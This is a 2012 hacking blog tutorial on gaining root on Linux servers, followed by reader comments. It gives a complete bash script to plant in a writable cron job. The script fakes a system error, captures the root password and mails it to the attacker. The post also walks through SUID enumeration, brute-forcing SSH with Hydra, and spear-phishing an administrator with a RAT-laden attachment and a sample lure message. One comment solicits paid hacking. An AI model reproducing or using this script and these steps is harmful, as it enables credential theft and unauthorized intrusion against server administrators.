Rooting a Server without any Public Local Root Kernel Exploits!

Posted: 07/26/2012 in G.N.A.HackTeam, Hacking, Info, Linux Hacking, Mac Hacking
Tags: , , , , , , , , , , , , , , , , , , , , , , ,

Hello to Everyone!

As I told to another Comment of a Post I made, and because a Visitor of this Blog requested it, I will share with you some Methods on How to Root a Server when there isn’t any Local Root Kernel Exploit available!

1 – Looking for Custom Cron Tab Scripts

Cron Jobs are some Tasks that are set to be Executed at a specific time. If the Root user has created a Custom Script used by Cron, and we can Write on this File, we can send a “Fake” Error Message and the Root user will probably type in his password.

First, check out if there are any Cron Job Tasks:

crontab -l

If you see any Custom Script, we must Check out if we can Write on it.

Let’s say we got a Custom script here: /bin/cronscript

To check if we can Write a File, type:

stat /bin/cronscript

(If you get something like: “-rwxrwxrwx” in the output, you can edit the File!)

Let’s edit the file and send a Fake Error Message.

Make a Copy of the Original Script to /bin/cronscript.bak:

cp /bin/cronscript /bin/cronscript.bak

Edit the /bin/cronscript like this:


echo “An System Error Occured!”

echo “”

echo “Error Code: #131425”

echo “”

echo “Update to get the Latest Patch for this Security Issue.”

read -s -p “[sudo] password for root ” rootpasswd

echo “”

echo “su: Authentication failure”

echo “”

sudo apt-get update && sudo apt-get upgrade

sudo echo “The Password is: $rootpasswd” > .kod

mail -s “Root’s Password” “” < .kod

rm .kod

mv cronscript.bak cronscript

You should just Replace the Underlined with your E-Mail and the Name of the Script!

After you save the File, type: chmod +x cronscript   to set it as Executable!

This script will:

– Send a Fake Error Message

– Request for the Root’s Password

– Send to your E-Mail Address the Password (make sure that there is the “mail” command at the /bin)

– Restore the Original File

When the Script gets Executed, the Root User will Enter his Password and it will be send to you!

It would be better if you had some knowledge on Bash Programming…

2 – Enumerating all SUID Files

An SUID File is any file that any User group has the Priviliges to Access, Read and Write on it.
What does this mean for you:  You can Escalate Priviliges in this way, if it is in an Important Directory.
As before, you can Social-Engineer a Privileged User.

To find all SUID Files, type:

find / -user root -perm -4000 -print

This will show all the SUID Files to your Terminal. Take your time and check them as they can help you to escalate Priviliges!

3 – Private Local Root Exploits

You can find Private Local (or Remote but it is far less common) Root Exploits by searching Google!

I have found Three (!) Private Local Root Exploits on some Kernel Versions I needed.

So, Search search search! 😉

4 – Bruteforcing Passwords

You can also try to Bruteforce the Password of the Root user or other Priviliged Users!

Use the script named “rootdabitch“!

It runs on the Background and sends you the Password if it is Found!

Here is the Website of the Script….

You can also try to Bruteforce it via SSH! If you scan it with NMap and Find an SSH Port Open (Usually 22), you can Use Hydra to Crack the Password and gain Root Access via SSH!

Here is a Video on how to Bruteforce Passwords with Hydra over SSH:

5 – Social-Engineering the Administrator

This method doesn’t Depend on any Hacking Skills but to your Social-Engineering skills and Research Methods!

You can find so many great Books on Social-Engineering on Google. Search!

Follow these Steps:

1. Search on Google, Facebook,Twitter for Friends of the Administrator

2. Find Personal Information about the Admin (Names, Family, Work Location etc…)

3. Find E-Mails, Telephone/Mobile Numbers

4. Create a JavaDriveBy or a RAT

5. Send a Fake-Mail using a Fake-Mailer as a Friend of the Server’s Administrator including an Infected File (with your RAT)

6. The Admin should open the File and you get Root Priviliges!
Example Message:

Hello Bob!

How are you? I just found out something awesome you will surely like!

It is a surprize! It is attached on a PDF File!

Check it out!
See ya!

Bob is the Victim (the Server’s Administrator). Thus, you have to Pretend to be his Friend. You need to research and Find a Close Friend and His E-Mail address so that it doesn’t seem as an Attack!

Summing that Up,  These are the Steps you should follow:

– Search for a Public Local Root Kernel Exploit. Here is my own Database:

– If you don’t find the Appropriate Exploit, try searching Google for Private Local/Remote Root Kernel Exploits.

– If you don’t find something again, try finding all SUID Files and Writeable Cron Tab Scripts that you can Exploit.

– If you aren’t satisfied with the Result, try to Brute-Force User or Root Passwords with Hydra or rootdabitch.

As you can see, you need to have Imagination, good Research Techniques, Programming Knowledge is Preffered, Unix Knowledge and Social-Engineering! Learn even the most basics of all these, and you will know how to Root Servers in Minutes!

If you like this Post,

you will also love this one…


Please Read the Disclaimer here…

  1. blood says:

    great tutorial man !

  2. Leecher says:

    Its seems you know so much about ethical hacking.I would like to work with you on real field.I have idea & i need a good hacker like you to get what i want.i will pay you 100000 USD,if you work for me as i say.i wont consider you as a worker but as a friend.So you will love to work with me.if interested,then mail me at achuda69[at]

  3. […] You can also check this Post out, if you like this Tutorial…. […]

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s